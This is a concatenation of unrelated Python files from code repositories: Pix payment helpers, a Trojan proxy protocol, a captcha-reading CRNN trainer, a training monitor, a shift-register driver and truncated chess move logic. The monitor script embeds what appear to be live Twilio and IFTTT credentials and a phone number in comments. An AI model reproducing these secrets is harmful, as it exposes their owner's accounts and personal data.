App(root)\n\n\nroot.mainloop()\n\n\n","repo_name":"Igotabiggit/Soundboard","sub_path":"Buttons.py","file_name":"Buttons.py","file_ext":"py","file_size_in_byte":1594,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"15239753057","text":"import requests\nimport base64\nimport json\nimport string\nimport random\n\nfrom gerencianet import Gerencianet\nfrom django.conf import settings\nfrom client.register.models import Clients\n\ndef get_token_api_payment():\n credentials = {\n \"client_id\": settings.DEV_CLIENT_KEY,\n \"client_secret\": settings.DEV_SECRET_KEY,\n}\n\n certificado = f'client/payment_api/certificates/{settings.CERT_DEV}' # 
A variável certificado é o diretório em que seu certificado em formato .pem deve ser inserido\n \n auth = base64.b64encode(\n (f\"{credentials['client_id']}:{credentials['client_secret']}\"\n ).encode()).decode()\n\n url = \"https://api-pix-h.gerencianet.com.br/oauth/token\" #Para ambiente de Desenvolvimento\n\n payload=\"{\\r\\n \\\"grant_type\\\": \\\"client_credentials\\\"\\r\\n}\"\n headers = {\n 'Authorization': f\"Basic {auth}\",\n 'Content-Type': 'application/json'\n }\n\n response = requests.request(\"POST\",\n url,\n headers=headers,\n data=payload,\n cert=certificado)\n access = response.json()\n\n return access['access_token']\n\ndef _headers():\n heraders = {\n 'Authorization': f'Bearer {get_token_api_payment()}',\n 'Content-Type': 'application/json'\n }\n return heraders\n\ndef generate_key_pix():\n print('Gerando chave...')\n\n certificado = f'{settings.PATH_CREDENTIALS}{settings.CERT_DEV}'\n\n url = \"https://api-pix-h.gerencianet.com.br/v2/gn/evp\"\n\n payload={}\n headers = {\n 'authorization': f'Bearer {get_token_api_payment()}',\n #'Content-Type': 'application/json'\n }\n\n response = requests.request(\"POST\", url, headers=headers, data=payload, cert=certificado)\n print(response)\n\n return response.json()\n\ndef txid_generator(size=6, chars=string.ascii_uppercase + string.digits):\n return ''.join(random.choice(chars) for _ in range(size))\n\ndef pix_payment(client_id, shopping_cart, total, name_information=\"Campo adicional\", additional_information=\"Informação adicional\"):\n clients = Clients.objects.filter(pk=client_id)\n client = [info.to_json() for info in clients]\n\n headers = _headers()\n certificado = f'client/payment_api/certificates/{settings.CERT_DEV}'\n\n url = f'{settings.GN_BASE_URL}/v2/cob'\n payload = json.dumps({\n \"calendario\": {\n \"expiracao\": 3600\n },\n \"devedor\": {\n \"cpf\": client[0]['cpf'],\n \"nome\": client[0]['name']\n },\n \"valor\": {\n \"original\": str(total)\n },\n \"chave\": \"e63a6451-ec39-450a-aaac-6310baaa25e7\",\n \"solicitacaoPagador\": \"Informe o número ou identificador do pedido.\"\n })\n\n response = requests.request(\"POST\", url, headers=headers, data=payload, cert=certificado)\n \n #save_pix(response.json(), request.user.pk, company)\n\n return response.json()\n\ndef generate_qr_code(loc_id):\n\n headers = _headers()\n certificate = f'{settings.PATH_CREDENTIALS}{settings.CERT_DEV}'\n\n if loc_id:\n url = url = f\"{settings.GN_BASE_URL}/v2/loc/{loc_id}/qrcode\"\n else:\n return 'Informe o id de localização da cobrança'\n\n response = requests.request(\"GET\", url, headers=headers, data={}, cert=certificate)\n qrcode = response.json()\n\n return qrcode['imagemQrcode']\n\ndef pix_revision(txid):\n\n headers = _headers()\n certificado = f'{settings.PATH_CREDENTIALS}{settings.CERT_DEV}'\n\n if txid:\n url = f'{settings.GN_BASE_URL}/v2/cob/{txid}'\n else:\n return 'Informe o localizador da cobrança'\n\n payload = json.dumps({\n \"calendario\": {\n \"expiracao\": 600\n },\n \"devedor\": {\n \"nome\": \"Fukuma\",\n \"cpf\": \"70921227086\"\n },\n \"valor\": {\n \"original\": \"3000.00\"\n },\n \"chave\": \"03659197050\",\n \"solicitacaoPagador\": \"Informe o número ou identificador do pedido.\",\n \"infoAdicionais\": [\n {\n \"nome\": \"Campo 1\",\n \"valor\": \"valor 1\"\n }\n ]\n })\n\n response = requests.request(\"PATCH\", url, headers=headers, data=payload, cert=certificado)\n\n return 
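`get_token_api_payment` above builds an HTTP Basic credential by base64-encoding `client_id:client_secret`. That encoding step in isolation, with placeholder credentials:

```python
import base64

client_id = "Client_Id_123"          # placeholders, not real credentials
client_secret = "Client_Secret_456"
auth = base64.b64encode(f"{client_id}:{client_secret}".encode()).decode()
headers = {"Authorization": f"Basic {auth}", "Content-Type": "application/json"}
print(headers["Authorization"])
```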
response","repo_name":"Daniflav94/E-commerce","sub_path":"Backend/services/client/client/payment_api/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4260,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"14751719902","text":"\"\"\"Trojan protocol implementation.\n\nLinks:\n https://trojan-gfw.github.io/trojan/protocol\n\"\"\"\nfrom dataclasses import dataclass\nfrom functools import cached_property\nfrom hashlib import sha224\n\nfrom typing_extensions import Self\n\nfrom p3.common.tcp import TCPConnector\nfrom p3.contrib.basic.socks5 import Socks5Addr, Socks5Atyp, Socks5Cmd\nfrom p3.iobox import TLSCtxInbox, TLSCtxOutbox\nfrom p3.stream import (Acceptor, ProxyAcceptor, ProxyConnector, ProxyRequest,\n Stream)\nfrom p3.stream.errors import ProtocolError\nfrom p3.utils.override import override\n\n\n@dataclass\nclass TrojanRequest:\n \"\"\"\n +-----+------+----------+----------+\n | CMD | ATYP | DST.ADDR | DST.PORT |\n +-----+------+----------+----------+\n | 1 | 1 | Variable | 2 |\n +-----+------+----------+----------+\n \"\"\"\n cmd: Socks5Cmd\n dst: Socks5Addr\n\n def __bytes__(self) -> bytes:\n return bytes(self.cmd) + bytes(self.dst)\n\n @classmethod\n async def read_from_stream(cls, stream: Stream) -> Self:\n cmd = await Socks5Cmd.read_from_stream(stream)\n dst = await Socks5Addr.read_from_stream(stream)\n return cls(cmd, dst)\n\n\n@dataclass\nclass TrojanHeader:\n \"\"\"\n +-----------------------+---------+----------------+---------+----------+\n | hex(SHA224(password)) | CRLF | Trojan Request | CRLF | Payload |\n +-----------------------+---------+----------------+---------+----------+\n | 56 | X'0D0A' | Variable | X'0D0A' | Variable |\n +-----------------------+---------+----------------+---------+----------+\n \"\"\"\n auth: bytes\n req: TrojanRequest\n\n def __bytes__(self) -> bytes:\n return self.auth + b'\\r\\n' + bytes(self.req) + b'\\r\\n'\n\n @classmethod\n async def read_from_stream(cls, stream: Stream) -> Self:\n auth = await stream.readuntil(b'\\r\\n', strip=True)\n if len(auth) != 56:\n raise ProtocolError('trojan', 'crlf')\n req = await TrojanRequest.read_from_stream(stream)\n empty = await stream.readuntil(b'\\r\\n', strip=True)\n if len(empty) != 0:\n raise ProtocolError('trojan', 'crlf')\n return cls(auth, req)\n\n\nclass TrojanConnector(ProxyConnector):\n auth: bytes\n\n ensure_next_layer = True\n\n def __init__(self, auth: bytes, **kwargs):\n super().__init__(**kwargs)\n assert len(auth) == 56\n self.auth = auth\n\n @override(ProxyConnector)\n async def connect(self, rest: bytes = b'') -> Stream:\n assert self.next_layer is not None\n dst = Socks5Addr(Socks5Atyp.DOMAINNAME, self.addr)\n treq = TrojanRequest(Socks5Cmd.Connect, dst)\n req = bytes(TrojanHeader(self.auth, treq))\n if len(rest) != 0:\n req += rest\n return await self.next_layer.connect(rest=req)\n\n\nclass TrojanAcceptor(ProxyAcceptor):\n auth: bytes\n\n ensure_next_layer = True\n\n def __init__(self, auth: bytes, **kwargs):\n super().__init__(**kwargs)\n assert len(auth) == 56\n self.auth = auth\n\n @override(ProxyAcceptor)\n async def accept(self) -> Stream:\n assert self.next_layer is not None\n stream = await self.next_layer.accept()\n async with stream.cm(exc_only=True):\n header = await TrojanHeader.read_from_stream(stream)\n auth, req = header.auth, header.req\n if auth != self.auth:\n raise ProtocolError('trojan', 'auth')\n Socks5Cmd.Connect.ensure(req.cmd)\n return stream\n\n\nclass TrojanInbox(TLSCtxInbox):\n 
scheme = 'trojan'\n\n @cached_property\n def auth(self) -> bytes:\n return sha224(self.url.pwd.encode()).hexdigest().encode()\n\n @override(TLSCtxInbox)\n async def accept_primitive(\n self,\n next_acceptor: Acceptor,\n ) -> tuple[Stream, ProxyRequest]:\n acceptor = TrojanAcceptor(auth=self.auth, next_layer=next_acceptor)\n return await ProxyRequest.from_acceptor(acceptor=acceptor)\n\n\nclass TrojanOutbox(TLSCtxOutbox):\n scheme = 'trojan'\n\n @cached_property\n def auth(self) -> bytes:\n return sha224(self.url.pwd.encode()).hexdigest().encode()\n\n @override(TLSCtxOutbox)\n async def connect(self, req: ProxyRequest) -> Stream:\n next_connector = TCPConnector(\n tcp_extra_kwargs=self.tcp_extra_kwargs,\n addr=self.url.addr,\n )\n connector = TrojanConnector(\n auth=self.auth,\n addr=req.addr,\n next_layer=next_connector,\n )\n return await connector.connect(rest=req.rest)\n","repo_name":"vhqr0/python-proxy-platform","sub_path":"p3/contrib/basic/trojan.py","file_name":"trojan.py","file_ext":"py","file_size_in_byte":4572,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"14751808672","text":"from collections.abc import Callable\nfrom struct import Struct\nfrom typing import Any\n\nfrom p3.stream.buffer import Buffer\nfrom p3.stream.stream import Stream\n\n\nclass BaseStruct(Struct):\n\n def pack_varlen(self, buf: bytes) -> bytes:\n return self.pack(len(buf)) + buf\n\n def unpack_with_types(\n self,\n buf: bytes,\n *ts: Callable[[Any], Any],\n ) -> tuple[Any, ...]:\n vs = self.unpack(buf)\n return tuple(t(v) for t, v in zip(ts, vs))\n\n async def read_from_stream(self, stream: Stream) -> tuple[Any, ...]:\n buf = await stream.readexactly(self.size)\n return self.unpack(buf)\n\n async def read_from_stream_with_types(\n self,\n stream: Stream,\n *ts: Callable[[Any], Any],\n ) -> tuple[Any, ...]:\n buf = await stream.readexactly(self.size)\n return self.unpack_with_types(buf, *ts)\n\n async def read_varlen_from_stream(self, stream: Stream) -> bytes:\n blen, = await self.read_from_stream(stream)\n return await stream.readexactly(blen)\n\n def pop_from_buffer(self, buffer: Buffer) -> tuple[Any, ...]:\n buf = buffer.pop(self.size)\n return self.unpack(buf)\n\n def pop_from_buffer_with_types(\n self,\n buffer: Buffer,\n *ts: Callable[[Any], Any],\n ) -> tuple[Any, ...]:\n buf = buffer.pop(self.size)\n return self.unpack_with_types(buf, *ts)\n\n def pop_varlen_from_buffer(self, buffer: Buffer) -> bytes:\n blen, = self.pop_from_buffer(buffer)\n return buffer.pop(blen)\n\n\nBStruct = BaseStruct('!B')\nHStruct = BaseStruct('!H')\nIStruct = BaseStruct('!I')\nQStruct = BaseStruct('!Q')\n","repo_name":"vhqr0/python-proxy-platform","sub_path":"p3/stream/structs.py","file_name":"structs.py","file_ext":"py","file_size_in_byte":1653,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"19461186111","text":"from crnn import *\n\n\n# config\nclass Config:\n # data\n train_data_path = Path('data/images')\n # train_data_path = Path('data/kaggle_data/samples')\n test_data_path = Path('data/test_images')\n model_dir = Path('models')\n\n # model architecture\n in_channels = 3\n rnn_hidden_size = 256\n leaky_relu = False\n\n # training\n n_epochs = 5\n lr = 1e-3\n bs = 64\n model_name = 'ocr_crnn_captcha'\n\n\ndef get_ds(items):\n item_tfms = [PILImage.create, ]\n y_tfms = [label_func, CategorizeList(add_na=False), ]\n\n ds = Datasets(\n items=items,\n tfms=[\n item_tfms,\n y_tfms,\n ],\n 
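`BaseStruct.pack_varlen` and `pop_varlen_from_buffer` in the structs record implement simple length-prefixed framing: the struct encodes the payload length, then the payload follows. The round trip with the stock `struct` module:

```python
from struct import Struct

H = Struct("!H")  # big-endian 16-bit length prefix, like HStruct above

def pack_varlen(payload: bytes) -> bytes:
    return H.pack(len(payload)) + payload

frame = pack_varlen(b"hello")
print(frame)                          # b'\x00\x05hello'
(length,) = H.unpack(frame[:H.size])  # read the prefix back
print(frame[H.size:H.size + length])  # b'hello'
```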
splits=RandomSplitter(valid_pct=0.2, seed=42)(items),\n )\n return ds\n\n\ndef get_dls(ds, bs=64):\n dls = ds.dataloaders(\n bs=bs,\n before_batch=BeforeBatchTransform(keep_ratio=True),\n create_batch=CreateBatchTransform(),\n after_batch=[IntToFloatTensor, Normalize.from_stats([0.5] * 3, [0.5] * 3)],\n )\n return dls\n\n\ndef train(config):\n # load data\n f_names = get_image_files(config.train_data_path)\n ds = get_ds(items=f_names)\n dls = get_dls(ds, bs=config.bs)\n\n # create model\n model = CRNN(\n in_channels=config.in_channels,\n rnn_hidden_size=config.rnn_hidden_size,\n n_classes=ds.tfms[1][-1].n_classes,\n leaky_relu=config.leaky_relu,\n )\n loss_func = CTCLoss(blank=ds.tfms[1][-1].blank_idx)\n metrics = [AccMetric()]\n\n # create learner\n learner = Learner(\n dls=dls,\n model=model,\n loss_func=loss_func,\n metrics=metrics,\n )\n\n # fit one cycle\n learner.fit_one_cycle(config.n_epochs, lr=config.lr)\n\n learner.model_dir = config.model_dir\n learner.save(config.model_name)\n\n learner.export(config.model_dir / f'{config.model_name}.pkl')\n\n\ndef evaluate(config):\n # load learner\n learner = load_learner(config.model_dir / f'{config.model_name}.pkl')\n\n # create test_dl\n test_files = get_image_files(config.test_data_path)\n test_dl = learner.dls.test_dl(test_files, with_labels=True)\n\n # validate test_dl\n test_loss, test_acc = learner.validate(dl=test_dl)\n print(f'test_loss = {test_loss}, test_acc = {test_acc}')\n\n\nif __name__ == '__main__':\n config = Config()\n print('-' * 10, 'Training', '-' * 10)\n train(config)\n\n print('-' * 30)\n\n print('-' * 10, 'Test', '-' * 10)\n evaluate(config)\n","repo_name":"thanhlt998/ocr_captcha_crnn","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":2418,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"} +{"seq_id":"31381738182","text":"import psutil\nimport sys, getopt\nfrom SendSMS import sendSMS\nimport time\nimport signal\nimport os\nimport subprocess\n\n# #use twilio SMS to notify auto-termination\n# from twilio.rest import Client\n# # Your Account SID from twilio.com/console\n# account_sid = \"ACd910fbbc47da001bd0fedcb5244cde07\"\n# # Your Auth Token from twilio.com/console\n# auth_token = \"c0c0d3a6a1340e70aa1e89d9808adc9f\"\n# client = Client(account_sid, auth_token)\n# message = client.messages.create(\n# # 这里中国的号码前面需要加86\n# to=\"+8613809008267\", \n# from_=\"+14356592468\",\n# body=\"This is a notification message for program termination\")\n# print(message.sid)\n\n# #use IFTTT to send notification\n# import requests\n \n# def send_notice(event_name, key, text):\n# url = \"https://maker.ifttt.com/trigger/\"+event_name+\"/with/key/\"+key+\"\"\n# payload = \"{\\\"value1\\\": \\\"\"+text+\"\\\"}\"\n# headers = {\n# 'Content-Type': \"application/json\",\n# 'User-Agent': \"PostmanRuntime/7.15.0\",\n# 'Accept': \"*/*\",\n# 'Cache-Control': \"no-cache\",\n# 'Postman-Token': \"a9477d0f-08ee-4960-b6f8-9fd85dc0d5cc,d376ec80-54e1-450a-8215-952ea91b01dd\",\n# 'Host': \"maker.ifttt.com\",\n# 'accept-encoding': \"gzip, deflate\",\n# 'content-length': \"63\",\n# 'Connection': \"keep-alive\",\n# 'cache-control': \"no-cache\"\n# }\n \n# response = requests.request(\"POST\", url, data=payload.encode('utf-8'), headers=headers)\n \n# print(response.text)\n \n# text = \"Training complete!\"\n# send_notice('notify_phone', 'ciupL2jYLeb8biRCYTfUnr', text)\n\ndef terminate_acme():\n PROCNAME=\"acmeIngress_mp.py\"\n sig=signal.SIGTERM\n for proc in 
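`terminate_acme` in the monitor record walks every process with psutil and signals the one whose command line mentions the training script. The same idea with the usual permission/race errors handled (the script name is the one hard-coded above):

```python
import os
import signal
import psutil

for proc in psutil.process_iter():
    try:
        cmdline = proc.cmdline()
    except psutil.Error:
        continue  # process vanished or access was denied
    if any("acmeIngress_mp.py" in part for part in cmdline):
        os.kill(proc.pid, signal.SIGTERM)
```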
psutil.process_iter():\n for cmd in proc.cmdline():\n if PROCNAME in cmd :\n #print(proc.cmdline())\n #proc.kill()\n os.kill(proc.pid,sig)\n break\nif __name__=='__main__':\n #args=sys.argv\n #token=args[1]\n token=\"acmeSessionID\"\n cktToken=\"checkoutpointToken\"\n length=10\n totalReward=0.0\n avgReward=0.0\n NLoops=0\n RewardThreshold=70000\n NLoopsThreshold=10000\n \n opts,args=getopt.getopt(sys.argv[1:],\"ht:l:r:n:c:\")\n for opt,arg in opts:\n if opt==\"-h\":\n print ('monitory.py \\n-t \\n-l \\\n \\n-r \\n-n ')\n sys.exit()\n elif opt==\"-t\":\n token=arg\n elif opt==\"-c\":\n cktToken=arg\n elif opt==\"-l\":\n length=int(arg)\n elif opt==\"-r\":\n RewardThreshold=int(arg)\n elif opt==\"-n\":\n NLoopsThreshold=int(arg)\n filename = \"/home/templarares/acme/\"+token+\"/logs/evaluator/logs.csv\"\n filename2=\"/home/templarares/devel/src/bit-car-inout-controller/etc/NLoops.yaml\"\n cktDir=\"/home/templarares/acme/\"+cktToken+\"/checkpoints/d4pg_learner\"\n while True:\n with open(filename, 'rb') as fp:\n line_offset=0\n offset=-60*(length+line_offset)\n fp.seek(offset,2)\n lines=fp.readlines()\n #calculate reward for the latest 10 runs\n \n for i in range(line_offset+1,line_offset+length+1):\n line=lines[-i].decode()\n #print(line)\n fst=line.index(\",\")\n #print(\"first is %d\"%fst)\n snd=line.index(\",\",fst+1)\n #print(\"second is %d\"%snd)\n reward=float(line[fst+1:snd])\n \n #second version, with two more commas\n trd=line.index(\",\",snd+1)\n fth=line.index(\",\",trd+1)\n reward=float(line[trd+1:fth])\n #print(reward)\n totalReward+=reward\n avgReward=totalReward/length\n print(avgReward)\n fp.close()\n with open(filename2, 'r') as fp:\n first_line=fp.readline().strip('\\n')\n comma=first_line.find(\":\")\n if comma>0:\n NLoops=int(first_line[comma+2:])\n else:\n NLoops=1\n print(\"NLoops= %d\"%NLoops)\n fp.close()\n if avgReward>RewardThreshold and NLoops>NLoopsThreshold:\n #make snapshots of the checkpoint several times, wait for the optimal networks to be saved locally\n #time.sleep(60)\n p=subprocess.Popen(['git','init'],cwd=cktDir)\n p.wait()\n p.kill()\n for i in range(42):\n p=subprocess.Popen(['git','add','.'],cwd=cktDir)\n p.wait()\n p.kill()\n commitMsg='\\\"snapshot%d\\\"'%i\n p=subprocess.Popen(['git','commit','-m',commitMsg],cwd=cktDir)\n p.wait()\n p.kill()\n time.sleep(35)\n \n sendSMS()\n terminate_acme()\n sys.exit(\"Training completion criteria met!\")\n totalReward=0\n time.sleep(42)","repo_name":"templarares/acme_ingress","sub_path":"monitor.py","file_name":"monitor.py","file_ext":"py","file_size_in_byte":5050,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"14278753341","text":"from machine import Pin\r\n\r\n#default pins for your Raspberry Pi Pico/PicoW\r\nlatchPin = 7 #RCLK\r\nclockPin = 6 #SRCLK\r\ndataPin = 8 #SER\r\n\r\n# The shift register is a 74HC595\r\n# This shiftregister class helps reduce the number of pins needed by the microcontroller\r\n# This class also supports daisy chaining shift registers\r\n# To use this class, you need to connect the shift register to your microcontroller\r\n# The shift register is connected to the microcontroller as follows:\r\n# latchPin = 7 (RCLK pin 12 on 74HC595)\r\n# clockPin = 6 (SRCLK pin 11 on 74HC595)\r\n# dataPin = 8 (SER pin 14 on 74HC595)\r\n# First, set the register size\r\n# Next, set the register property in the class as an array, for example if the size is 8, then the register is [0,0,0,0,0,0,0,0]\r\n# Then call the set_register() method to 
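The monitor's main loop reads the last few evaluator log lines by seeking backwards from the end of the file (`fp.seek(offset, 2)`), assuming a line is at most ~60 bytes. The trick as a small helper, with that assumption made explicit:

```python
def tail_lines(path: str, n: int, max_line_bytes: int = 60) -> list:
    # assumes every line fits in max_line_bytes; raises OSError if the
    # file is shorter than the requested window
    with open(path, "rb") as fp:
        fp.seek(-max_line_bytes * n, 2)  # whence=2 means "from the end"
        return fp.readlines()[-n:]
```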
set the register\r\n# To change the register, change the register property then call the set_register() method again\r\n\r\nclass shiftregister():\r\n def __init__(self) -> None:\r\n self.register = []\r\n self.latch = Pin(latchPin, Pin.OUT)\r\n self.clock = Pin(clockPin, Pin.OUT)\r\n self.data = Pin(dataPin, Pin.OUT)\r\n \r\n def __delete__(self):\r\n self.register = []\r\n self.setregister()\r\n self.latch.low()\r\n self.clock.low()\r\n self.data.low()\r\n\r\n #optional class to set the pins on your microcontroller\r\n def set_pins(self, latch_pin, clock_pin, data_pin):\r\n self.latch.low()\r\n self.clock.low()\r\n self.data.low()\r\n del(self.latch)\r\n del(self.clock)\r\n del(self.data)\r\n self.latch = Pin(latch_pin, Pin.OUT)\r\n self.clock = Pin(clock_pin, Pin.OUT)\r\n self.data = Pin(data_pin, Pin.OUT)\r\n \r\n def set_registerSize(self,size):\r\n for i in range(size):\r\n self.register.append(0)\r\n\r\n def set_register(self):\r\n #open latch for data\r\n self.clock.low()\r\n self.latch.low()\r\n self.clock.high()\r\n\r\n #load data in register\r\n for i in range(len(self.register)-1, -1, -1):\r\n self.clock.low()\r\n if self.register[i] == 1:\r\n self.data.high()\r\n else:\r\n self.data.low()\r\n self.clock.high()\r\n\r\n #close latch for data\r\n self.clock.low()\r\n self.latch.high()\r\n self.clock.high()","repo_name":"gobbyo/IoT","sub_path":"python/raspberrypi/pico/shiftregister.py","file_name":"shiftregister.py","file_ext":"py","file_size_in_byte":2357,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"3524916038","text":"from copy import deepcopy\nfrom typing import List, Tuple, Dict, Optional, Callable, Set\n\nfrom j_chess_lib.ai.board import BoardState\nfrom j_chess_lib.communication import MoveData\n\n\ndef _add(t1: Tuple[int, int], t2: Tuple[int, int]) -> Tuple[int, int]:\n return t1[0] + t2[0], t1[1] + t2[1]\n\n\ndef _mul(t1: Tuple[int, int], mul: int) -> Tuple[int, int]:\n return t1[0] * mul, t1[1] * mul\n\n\ndef get_possible_moves(\n board_state: Dict[Tuple[str, int], Optional[str]], white: bool\n) -> List[Tuple[Tuple[str, int], Tuple[str, int]]]:\n ret: Set[Tuple[Tuple[str, int], Tuple[str, int]]] = set()\n\n fun: Callable[[str], bool] = str.isupper if white else str.islower\n for origin_position, figure in board_state.items():\n if not fun(figure):\n continue\n moves = get_next_position(origin_position=origin_position, board_state=board_state)\n ret.update([(origin_position, x[0]) for x in moves])\n # print(origin_position, figure)\n # print(moves)\n\n return list(ret)\n\n\ndef kill_king_move(board_state: Dict[Tuple[str, int], Optional[str]],\n move: Tuple[Tuple[str, int], Tuple[str, int]]) -> bool:\n f, t = move\n if (f not in board_state) or (t not in board_state):\n return False\n white = board_state[f].isupper()\n enemy: Callable[[str], bool] = str.islower if white else str.isupper\n return enemy(board_state[t]) and board_state[t] in (\"k\", \"K\")\n\n\ndef in_chess(board_state: Dict[Tuple[str, int], Optional[str]], white: bool) -> bool:\n opponent_moves = get_possible_moves(board_state=board_state, white=not white)\n return any(kill_king_move(board_state=board_state, move=x) for x in opponent_moves)\n\n\ndef in_chess_after_move(board_state: Dict[Tuple[str, int], Optional[str]],\n move: Tuple[Tuple[str, int], Tuple[str, int]],\n white: bool) -> bool:\n new_board = deepcopy(board_state)\n new_board[move[1]] = board_state[move[0]]\n del new_board[move[0]]\n return in_chess(board_state=new_board, 
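The comment block in the shiftregister record already describes the intended call sequence; spelled out as hypothetical usage (only meaningful on a Pico with a 74HC595 wired to the default pins):

```python
sr = shiftregister()    # defaults: latch=GP7, clock=GP6, data=GP8
sr.set_registerSize(8)  # one 74HC595 provides 8 outputs
sr.register[0] = 1      # mark the first output high
sr.set_register()       # clock the bits out and latch them onto the pins
```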
white=white)\n\n\ndef is_promotion(board_state: Dict[Tuple[str, int], Optional[str]],\n move: Tuple[Tuple[str, int], Tuple[str, int]]) -> bool:\n try:\n f, t = move\n white = board_state[f].isupper()\n from_row = 7 if white else 2\n target_row = 8 if white else 1\n return board_state[f] in (\"p\", \"P\") and t[1] == target_row and f[1] == from_row\n except KeyError as e:\n return False\n\n\ndef get_next_position(\n origin_position: Tuple[str, int], board_state: Dict[Tuple[str, int], Optional[str]]\n) -> List[Tuple[Tuple[str, int], bool]]:\n if board_state[origin_position] in _FUNCTIONS:\n return _FUNCTIONS[board_state[origin_position]](origin_position, board_state)\n return []\n\n\ndef _get_next_position_straight(\n origin_position: Tuple[str, int], board_state: Dict[Tuple[str, int], Optional[str]], white: bool,\n directions: List[Tuple[int, int]], max_steps: int = 8\n) -> List[Tuple[Tuple[str, int], bool]]:\n j = 1\n moves = []\n hits = []\n start_pos = (ord(origin_position[0]), origin_position[1])\n enemy: Callable[[str], bool] = str.islower if white else str.isupper\n a, h = ord(\"a\"), ord(\"h\")\n while j <= max_steps and len(directions) > 0:\n for i, direction in reversed(list(enumerate(directions))):\n direction: Tuple[int, int]\n new_pos_tmp = _add(start_pos, _mul(direction, j))\n if not 1 <= new_pos_tmp[1] <= 8 or not a <= new_pos_tmp[0] <= h:\n del directions[i]\n continue\n new_pos: Tuple[str, int] = (chr(new_pos_tmp[0]), new_pos_tmp[1])\n if new_pos in board_state:\n if enemy(board_state[new_pos]):\n hits.append(new_pos)\n del directions[i]\n continue\n moves.append(new_pos)\n j += 1\n return [(x, False) for x in moves] + [(x, True) for x in hits]\n\n\ndef _get_next_position_rook(\n origin_position: Tuple[str, int], board_state: Dict[Tuple[str, int], Optional[str]], white: bool\n) -> List[Tuple[Tuple[str, int], bool]]:\n directions = [(1, 0), (-1, 0), (0, 1), (0, -1)]\n return _get_next_position_straight(origin_position=origin_position, board_state=board_state, white=white,\n directions=directions)\n\n\ndef _get_next_position_knight(\n origin_position: Tuple[str, int], board_state: Dict[Tuple[str, int], Optional[str]], white: bool\n) -> List[Tuple[Tuple[str, int], bool]]:\n hops = [(2, 1), (-2, 1), (2, -1), (-2, -1), (1, 2), (1, -2), (-1, 2), (-1, -2)]\n enemy: Callable[[str], bool] = str.islower if white else str.isupper\n start_pos = (ord(origin_position[0]), origin_position[1])\n a, h = ord(\"a\"), ord(\"h\")\n moves = [(chr(y[0]), y[1]) for y in (_add(x, start_pos) for x in hops) if a <= y[0] <= h and 1 <= y[1] <= 8]\n return [(x, x in board_state) for x in moves if x not in board_state or enemy(board_state[x])]\n\n\ndef _get_next_position_bishop(\n origin_position: Tuple[str, int], board_state: Dict[Tuple[str, int], Optional[str]], white: bool\n) -> List[Tuple[Tuple[str, int], bool]]:\n directions = [(1, 1), (-1, 1), (1, -1), (-1, -1)]\n return _get_next_position_straight(origin_position=origin_position, board_state=board_state, white=white,\n directions=directions)\n\n\ndef _get_next_position_queen(\n origin_position: Tuple[str, int], board_state: Dict[Tuple[str, int], Optional[str]], white: bool\n) -> List[Tuple[Tuple[str, int], bool]]:\n directions = [(1, 1), (-1, 1), (1, -1), (-1, -1), (1, 0), (-1, 0), (0, 1), (0, -1)]\n return _get_next_position_straight(origin_position=origin_position, board_state=board_state, white=white,\n directions=directions)\n\n\ndef _get_next_position_king(\n origin_position: Tuple[str, int], board_state: Dict[Tuple[str, int], Optional[str]], 
white: bool\n) -> List[Tuple[Tuple[str, int], bool]]:\n directions = [(1, 1), (-1, 1), (1, -1), (-1, -1), (1, 0), (-1, 0), (0, 1), (0, -1)]\n return _get_next_position_straight(origin_position=origin_position, board_state=board_state, white=white,\n directions=directions, max_steps=1)\n\n\ndef _get_next_position_pawn(\n origin_position: Tuple[str, int], board_state: Dict[Tuple[str, int], Optional[str]], white: bool\n) -> List[Tuple[Tuple[str, int], bool]]:\n direction = -1 + 2 * white\n home_row = 2 if white else 7\n moves = [(origin_position[0], origin_position[1] + direction)]\n if not 1 <= moves[0][1] <= 8:\n return []\n if origin_position[1] == home_row and moves[0] not in board_state:\n moves.append((origin_position[0], origin_position[1] + direction * 2))\n col = ord(origin_position[0])\n hits = [(chr(col + x), origin_position[1] + direction) for x in (-1, 1) if ord(\"a\") <= col + x <= ord(\"h\")]\n fun: Callable[[str], bool] = str.islower if white else str.isupper\n return [(x, False) for x in moves if x not in board_state] + \\\n [(x, True) for x in hits if x in board_state and fun(board_state[x])]\n\n\n_FUNCTIONS: Dict[\"str\",\n Callable[[Tuple[str, int], Dict[Tuple[str, int], Optional[str]]],\n List[Tuple[Tuple[str, int], bool]]]] = {\n \"p\": lambda o, b: _get_next_position_pawn(origin_position=o, board_state=b, white=False),\n \"P\": lambda o, b: _get_next_position_pawn(origin_position=o, board_state=b, white=True),\n \"r\": lambda o, b: _get_next_position_rook(origin_position=o, board_state=b, white=False),\n \"R\": lambda o, b: _get_next_position_rook(origin_position=o, board_state=b, white=True),\n \"n\": lambda o, b: _get_next_position_knight(origin_position=o, board_state=b, white=False),\n \"N\": lambda o, b: _get_next_position_knight(origin_position=o, board_state=b, white=True),\n \"b\": lambda o, b: _get_next_position_bishop(origin_position=o, board_state=b, white=False),\n \"B\": lambda o, b: _get_next_position_bishop(origin_position=o, board_state=b, white=True),\n \"q\": lambda o, b: _get_next_position_queen(origin_position=o, board_state=b, white=False),\n \"Q\": lambda o, b: _get_next_position_queen(origin_position=o, board_state=b, white=True),\n \"k\": lambda o, b: _get_next_position_king(origin_position=o, board_state=b, white=False),\n \"K\": lambda o, b: _get_next_position_king(origin_position=o, board_state=b, white=True),\n}\n\n\ndef predict_board(board: BoardState, move: MoveData) -> BoardState:\n board_dict = board.get_board()\n f = move.from_value[0], int(move.from_value[1])\n t = move.to[0], int(move.to[1])\n\n board_dict[t] = board_dict[f]\n del board_dict[f]\n if move.promotion_unit:\n board_dict[t] = move.promotion_unit.upper() if board.white_turn() else move.promotion_unit.lower()\n\n fen = board_to_fen(board=board_dict, fen_tail=board.fen.split(\" \", maxsplit=1)[-1])\n return 